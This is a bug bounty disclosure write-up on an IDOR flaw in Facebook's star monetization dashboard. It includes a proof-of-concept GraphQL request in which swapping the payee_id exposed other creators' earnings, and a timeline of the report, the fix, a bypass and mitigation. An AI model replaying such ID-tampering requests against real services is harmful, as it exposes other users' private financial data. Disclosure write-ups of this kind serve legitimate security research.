Unauthorized access to Facebook creator’s professional dashboard
Just after returning home from Bounty Con Singapore, I had to fly India in Mid-Oct 2022 for some family reasons. While staying there, my personal Facebook account had met the eligibility criteria of country location for the star monetization.
On the midnight of 30th Oct, 2022, I applied to star monetization for my personal Facebook account in order to explore the monetization section of the professional dashboard. Just after 30 minutes of exploring star monetization, I was able to view any Facebook creator’s estimated earnings, total stars received and earnings restriction due to violation of monetization policies.
Proof of concept
Request:
POST /graphql HTTP/2
Host: graph.facebook.com
-other headers-
client_doc_id=10537346114216466748965519952
{"params":{"is_on_load_actions_supported":true,"params":"{params:{\"server_params\":{\"subtype\":\"GTW\",\"payee_id\":\"pageID\",\"entrypoint\":\"MGMT_ADD_PAYOUT_NOTIFICATION\",\"client_extra\":{\"product_type\":\"stars\"},\"exit_destination\":\"deferred_onboarding_notifications\",\"hide_tabbar\":true},\"client_input_params\":{}},}","bloks_versioning_id":"Some_Value_1","app_id":"com.bloks.www.payout_onboarding"},"scale":"2","nt_context":{"styles_id":"Some_Value_2","using_white_navbar":true,"pixel_ratio":2,"is_push_on":true,"bloks_version":"Some_Value_3"}}where, the parameter payee_id=pageID was vulnerable to IDOR which discloses the estimated earnings, total stars received and earnings restriction of other Facebook creators.
Impact
Unauthorized access to any Facebook creator’s professional dashboard
Timeline
- 30 Oct, 2022 — Report sent to Facebook.
- 1 Nov, 2022 — Triaged.
- 3 Nov, 2022 — Bounty awarded by Facebook.
- 8 Nov, 2022 — Fixed.
- 15 Dec, 2022 — Bypass sent.
- 19 Dec, 2022 — Double bounty awarded by Facebook
- 30 Jan-25 Oct, 2023 — Asked for update.
- 25 Oct, 2023 — Got replied that the issue was mitigated during the month of March but never got fix message during that time.
